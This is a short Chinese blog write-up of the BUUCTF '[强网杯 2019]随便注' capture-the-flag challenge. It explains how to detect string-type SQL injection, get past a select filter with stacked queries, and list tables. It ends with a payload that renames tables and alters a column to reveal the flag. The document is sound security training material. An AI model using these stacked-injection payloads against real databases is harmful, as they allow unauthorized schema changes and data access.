buuctf [强网杯 2019]随便注

打开:
在这里插入图片描述
判断是数字型注入还是字符型注入:
在这里插入图片描述
2-1查询不同,可知非数字型
在这里插入图片描述
1和1a的查询效果一致,判断是字符型注入,sql语句中对查询的id应该是用单引号’包起来的。
比如,select id from xx where id = '1';
输入select,回显发现有关键字绕过!
在这里插入图片描述
那么联合查询,报错注入,布尔,时间盲注都无法使用了,我们还剩下堆叠注入。

先尝试使用堆叠注入:
1.1’ show tables;#
在这里插入图片描述

发现有两张表。
2.

1’; show columns from words;#
(words用`号包裹)

在这里插入图片描述

0’; show columns from 1919810931114514;#
(同样用`包裹)

在这里插入图片描述
只查到了一个表flag
3. 我们可以得知原sql语句,应该是查words表的id和data。
select id,data from words where id =
在这里插入图片描述
所以接下来我们应该如何查1919810931114514表的flag属性呢???
思路:

  1. 将word表改成word2
  2. 将1919810931114514表改成word表
  3. 将属性名flag改成id,然后用1’ or 1=1;# 显示flag出来
    payload:
1';rename table `words` to word2;
rename table `1919810931114514` to words;
alter table words change flag id varchar(100);

改完后,再查,即可获得flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值